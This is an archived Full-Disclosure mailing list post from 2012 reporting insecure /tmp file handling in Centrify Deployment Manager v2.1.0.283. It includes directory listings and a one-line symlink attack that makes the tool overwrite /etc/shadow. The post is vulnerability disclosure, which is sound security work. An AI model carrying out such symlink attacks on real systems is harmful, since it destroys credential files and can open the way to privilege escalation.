[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Centrify Deployment Manager v2.1.0.283 /tmp insecure file handling
- To: full <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Centrify Deployment Manager v2.1.0.283 /tmp insecure file handling
- From: larry Cashdollar <larry0@xxxxxx>
- Date: Mon, 03 Dec 2012 21:50:22 +0000 (GMT)
<html><body><div><h2>Centrify Deployment Manager v2.1.0.283</h2><hr>
<p>While at a training session for centrify, I noticed poor
handling of files in /tmp. I was able to overwrite /etc/shadow with the
contents of adcheckDMoutput.
</p><p>I am sure there are more vulnerabilities to be exploit, maybe a
local root - but being this is a training class I should probably
focus.....
</p><p>total 6680<br>
-rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210
</p><pre>-rw-rw-r-- 1 clyde clyde 188 Dec 3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh
drwx------ 2 root root 4096 Dec 3 10:25 vmware-root
drwxr-xr-x 7 root root 4096 Nov 30 2010 vmware-tools-distrib
</pre>
<p>[root@engnew-cen tmp]# ls -l<br>
total 6680<br></p><pre>-rw-rw-rw- 1 root root 3999 Dec 3 14:41
adcheckDMoutput
-rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh
drwx------ 2 root root 4096 Dec 3 10:25 vmware-root
drwxr-xr-x 7 root root 4096 Nov 30 2010 vmware-tools-distrib
</pre>
<p>[root@engnew-cen tmp]# ls -l<br>
total 6688<br></p><pre><b>-rw-rw-rw- 1 root root 3999 Dec 3 14:41
adcheckDMoutput </b>
-rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 clyde clyde 132 Dec 3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh
drwx------ 2 root root 4096 Dec 3 10:25 vmware-root
drwxr-xr-x 7 root root 4096 Nov 30 2010 vmware-tools-distrib
</pre>
<p>[root@engnew-cen tmp]# ls -l<br>
total 6672<br>
-rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh
</p><p># ln -s /etc/shadow adcheckDMoutput<br>
# ls -l /etc/shadow<br>
-r-------- 1 root root 3999 Dec 3 14:56 /etc/shadow
<br>
I am also assuming the .210 appended to the end of files in /tmp is the major
version number.
</p><p>Larry W. Cashdollar<br>
@_larry0
</p></div></body></html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/